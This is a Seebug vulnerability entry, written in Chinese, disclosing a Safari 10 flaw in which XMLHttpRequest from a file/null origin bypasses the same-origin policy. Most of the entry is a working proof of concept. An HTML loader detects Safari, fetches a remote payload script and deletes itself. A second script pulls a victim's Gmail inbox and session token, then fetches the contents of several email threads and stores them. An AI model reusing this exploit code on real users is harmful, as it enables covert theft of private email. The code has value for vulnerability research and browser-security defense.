safari10跨域漏洞

2017-10-09T00:00:00
ID SSV:96615
Type seebug
Reporter lxraa
Modified 2017-10-09T00:00:00

Description

safari 10的XMLHttpRequest在null域下可以随意发起跨域请求和设置http_header

我交到苹果的bugreport,并给apple发邮件后,他们自己悄悄把漏洞修了,连个邮件都没给我发,所以我决定公开poc

这是我在漏洞未修复前截的图:

这个漏洞可以造成同源策略绕过,随便跨域,这是我写的获取gmail数据的代码:

```html <script id='jquery' src='http://apps.bdimg.com/libs/jquery/2.1.1/jquery.min.js'></script> <script id='test'>

var server_address = 'http://127.0.0.1:8000/static/csrf_Wcn6h/'

function deleteSelf(){ let test = document.getElementById('test'); test.parentNode.removeChild(test);

} function getPoc(src,id){ //src:poc地址 id:append的<script>的id,用于移除改元素

let head = document.getElementsByTagName('HEAD').item(0);
script = document.createElement("script");
script.type = "text/javascript";
script.src = src;
script.id = id;
head.appendChild(script);
let test = document.getElementById(id);
test.parentNode.removeChild(test);

}

if('file:' == document.location.protocol && navigator.userAgent.toLowerCase().indexOf("safari")>-1 && navigator.userAgent.toLowerCase().indexOf("chrome")<0){ getPoc(server_address+"get_gmail.js","get_gmail");

deleteSelf();

} else{ deleteSelf();

}

</script>

```

```javascript

function send_to_server(data_sender){ localStorage.setItem((++num).toString(),data_sender.responseText);

}

let num = 0; let mail_list; let ik; let t = $.ajax({ type: 'get', url: "https://mail.google.com/", //data: data, headers:{'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8', 'Accept-Encoding':'gzip, deflate, br', 'Accept-Language':'zh-CN,zh;q=0.8,en;q=0.6', 'Host':'mail.google.com' }, success: function(event,xhr,settings){ mail_list = t.responseText.match(/var\sVIEW_DATA=(.*);\svar\sGM_TIMING_END_CHUNK2/)[1];

ik = t.responseText.match(/(.*)var\sGLOBALS=\[(.*?),(.*?),\"(.*?)\",\"(.*?)\",\"(.*?)\",\"(.*?)\",\"(.*?)\",\"(.*?)\",(.*?),\"(.*?)\"(.*)/)[11];

if(mail_list != null){

    mail_list = eval(mail_list)[3][2];
    console.log(mail_list);

    for(let i = 0;i &lt; 5;i++){

      let th = mail_list[i][0];
      let data_sender = $.ajax({
          type:'post',
          data:'',
          url:'https://mail.google.com/mail/?ik='+ik+'&view=cv&th='+th+'&prf=1&search=inbox',
          headers:{
              'Host': 'mail.google.com',
              'Connection': 'close',
              'Content-Length': '0',
              'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36',
              'Content-Type': 'application/x-www-form-urlencoded;charset=UTF-8',
              'Accept': '*\/*',
              'Accept-Encoding': 'gzip, deflate, br',
              'Accept-Language': 'zh-CN,zh;q=0.8,en;q=0.6',
              'X-Same-Domain': '1',
              'Origin': 'https://mail.google.com',
              'X-Chrome-UMA-Enabled': '1',
          },
          success:function(event,xhr,settings){
              send_to_server(data_sender);

          }
      });
    }
      //*/
}
else{
    console.log('get mail_list error');
}

} }); ```